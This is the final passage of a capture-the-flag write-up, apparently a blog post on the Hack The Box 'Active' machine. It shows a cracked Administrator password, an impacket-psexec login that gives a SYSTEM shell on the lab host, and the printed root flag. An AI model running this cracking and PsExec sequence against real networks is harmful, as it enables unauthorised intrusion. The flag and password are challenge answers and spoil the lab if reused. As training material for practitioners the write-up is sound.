Speed.#1.........:  3415.9 kH/s (2.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10530816/14344385 (73.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tr1nity -> Teague51
Hardware.Mon.#1..: Temp: 59c Util: 48%

Started: Wed Jul 16 18:33:56 2025
Stopped: Wed Jul 16 18:34:01 2025

Password: Ticketmaster1968

  • Now, let’s try to use PsExec, as the Administrator account may have administrative privileges on the target machine.
  • Note: It’s common to find service accounts with administrative rights due to misconfigurations in many Active Directory environments.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]
└─$ impacket-psexec active.htb/Administrator@10.10.10.100
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file vMwmGhAZ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service eTyL on 10.10.10.100.....
[*] Starting service eTyL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 15BB-D59C

 Directory of C:\Users\Administrator\Desktop

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021  07:49 ��    <DIR>          .

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021  07:49 ��    <DIR>          ..

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
16/07/2025  03:52 ��                34 root.txt

               1 File(s)             34 bytes
               2 Dir(s)   1.140.748.288 bytes free

C:\Users\Administrator\Desktop> type root.txt
57f24f5900db27e9139e64977342e842

Root Flag: 57f24f5900db27e9139e64977342e842

Thank you for your time.

Mission complete

alt text

This post is licensed under CC BY 4.0 by the author.